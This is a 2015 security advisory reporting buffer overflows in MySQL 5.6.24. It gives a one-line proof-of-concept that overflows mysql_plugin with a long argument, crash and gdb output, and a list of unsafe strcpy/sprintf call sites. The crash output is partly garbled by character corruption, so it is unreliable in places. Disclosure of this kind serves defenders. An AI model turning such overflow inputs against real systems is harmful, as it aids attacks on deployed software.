Advanced Information Security Corporation, Security Advisory (MYSQL- v5.6.24 Buffer Overflows)

From: Nicholas Lemonias. <lem.nikolas@googlemail.com>
To: bugtraq@securityfocus.com,oss-security@lists.openwall.com,cve-assign@mitre.org
Cc:
Subject: Advanced Information Security Corporation, Security Advisory (MYSQL- v5.6.24 Buffer Overflows)
Date:


.

===========================================================
 Advanced Information Security Corporation
 Security Advisory

 ===========================================================

 a888b.
 d888888b.
 8P"YP"Y88
 8|o||o|88
 8' - .88
 8`._.' Y8.
 d/ `8b.
 dP . Y8b.
 d8:' " `::88b
 d8" 'Y88b
 :8P ' :888
 8a. : _a88P
 ._/"Yaa_: .| 88P|
 \ YP" `| 8P `.
 / \.___.d| .'
 `--..__)888P`._.'

 ~ Keeping Things Simple!

 MySQL v5.6.24 BUFFER OVERFLOWS

 Date: 07/10/2015

 Author: Nicholas Lemonias

 ============================================================

 =========================
 SUMMARY
 =========================

 During a manual source code audit of MYSQL Version 5.6.24, various
 buffer overflow issues have been realized.

 ===================
 TECHNICAL DETAILS
 ===================

 root@priv8: ~# /usr/bin/mysql_plugin `perl -e 'print â??Aâ? x 9000'`

 *** buffer overflow detected ***: mysql_plugin terminated
 ======= Backtrace: =========
 /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
 /lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]

 /lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
 /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
 insecure call
 mysql_plugin(main+0x202)[0xb752ee22]
 /lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa
 63]
 mysql_plugin(+0xa90d)[0xb752f90d]
 ======= Memory map: ========
 b6800000-b6821000 nw-p 00000000 00:00
 b6821000-b6900000 ---p 00000000 00 00
 b699d000-b699e000 ---p 00000000 00:00
 b699e000-b71a1000 rw-p 00000000 00 00
 b71a1000-b7345000 r-xp 00000000 00:13 1673
 /lib/i386-linux-gnu/i686/cmov/libc-2.1
 9.50

 b7345000-b7347000 r-â??p 001a4000 00:13 1673
 /lib/i386-linux~gnu/i686/cmov/libc-2.1
 9.so

 b7347000-b7348000 rw-p 00la6000 00:13 1673
 /lib/i386-linux-gnu/i686/cmov/libc-2.1
 9.so

 b7348000-b734b000 rw-p 00000000 00 00 0

 b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
 b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
 b7368000â??b73ac000 r-xp 00000000 00:13 15649
 /lib/i386-linux-gnu/1686/cmov/libm-2.1
 9.so
 bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]

 Program received signal SIGABRT, Aborted.
 0xb7fdebe0 in __kernel_vsyscall ()
 (gdb) bt
 #0 0xb7fdebe0 in __kernel_vsyscall ()
 #1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
 at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
 #2 0xb7cab9c3 in __GI_abort () at abort.c:89
 #3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
 fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\nâ?)
 at ../sysdeps/posix/libc_fatal.c:175
 #4 0xb7d762d5 in __GI___fortify_fail (
 msg=msg@entry=0xb7ddbdd6 "buffer overflow detectedâ?)
 at fortify_fail.c:31
 #5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
 #6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
 src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
 at strcpy_chk.c:60
 #7 0x80009e22 in main ()

 (gdb)

 (gdb) disas
 Dump of assembler code for function __kernel_vsyscall:

 0xb7fdebd0 <+0>: push %ecx
 0xb7fdebd1 <+1>: push %edx
 0xb7fdebd2 <+2>: push %ebp
 0xb7fdebd3 <+3>: mov %esp,%ebp
 0xb7fdebd5 <+5>: sysenter
 0xb7fdebd7 <+7>: nop

 0xb7fdebd8 <+8>: nop

 0xb7fdebd9 <+9>: nop

 0xb7fdebda <+10>: nop
 0xb7fdebdb <+11>: nop
 0xb7fdebdc <+12>: nop
 0xb7fdebdd <+13>: nop
 0xb7fdebde <+14>: int x80
 => 0xb7fdebe0 <+16>: pop %ebp
 0xb7fdebe1 <+17>: pop %edx
 0xb7fdebe2 <+18>: pop %ecx
 0xb7fdebe3 <+19>: ret
 End of assembler dump.

 (gdb)

 ============================
 TECHNICAL SYNOPSIS / POC #2
 ============================

 Unsafe Use of strcpy; this can lead to a buffer overflow condition

 ----->
 /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]

 A user-supplied string from the command-line is copied to a fixed
 length destination buffer.

 -----------------[ mysql_plugin.c]-------------------------------

 Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
 strcpy(plugin_name, argv[i]);

 permission set:

 -rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin

 ===============================================
 MySQL V 5.6.24 VULNERABILITIES - SOURCE CODE
 ===============================================

 1. Insecure use of sprintf

 Vulnerability Description: A char* type is copied to a fixed length
 destination buffer. This could lead to a buffer overflow.

 Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c

 sprintf(efbuf, "MY_REG_%s", name);

 2.
 Unsafe Use of strcpy could lead to an overflow condition.
 Vulnerability Description: A user-supplied string from the
 command-line is copied to a fixed length destination buffer. This
 could lead to a buffer overflow.

 Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
 strcpy(plugin_name, argv[i]);

 3.
 Unsafe Use of strcpy could lead to an overflow condition.
 Vulnerability Description: A user-supplied string from the
 command-line is copied to a fixed length destination buffer. This
 could lead to a buffer overflow.

 Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
 strcpy(config_file, argv[i]);

 4.
 Insecure use of sprintf.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
 sprintf(grump, "matched null at `%.20s'", p);

 5.
 Insecure use of sprintf.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
 sprintf(grump, "matched `%.*s'", len, p);

 6.
 Unsafe Use of strcpy could lead to an overflow condition.
 Vulnerability Description: A user-supplied string from the
 command-line is being copied to a fixed length destination buffer.
 This could lead to a buffer overflow.
 Line: 413 - Filename:
 ./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/r
 eader.cpp
 strcpy(fileName, argv[1]);

 7.
 Insecure use of sprintf.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
 sprintf(grump, "matched `%.*s' instead", len, p);

 8.
 Insecure use of sprintf.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
 sprintf(query,"select count(*) from `%s`", table);

 9.
 Insecure use of sprintf
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
 sprintf(buf, "%s.conf", set);

 10.
 Unsafe Use of strcpy could lead to an overflow condition.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This could lead to a buffer overflow.
 Line: 784 - Filename:
 ./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.
 cpp
 strcpy(path, src);

 11.
 Unsafe Use of strcpy could lead to an overflow condition.
 Vulnerability Description: A char* type is being copied to a fixed
 length destination buffer. This, could lead to an overflow.
 Line: 377 - Filename:
 ./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.
 cpp
 strcpy(path, src);
 <<<
 Size of PATH is PATH_MAX 256



** Full report download:

https://dl.packetstormsecurity.net/1510-exploits/MySQL0days.pdf


Additionally we would like to request  a CVE , for easier reference to
the issues.


 Copyright  © 2015 Advanced Information Security Corporation





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.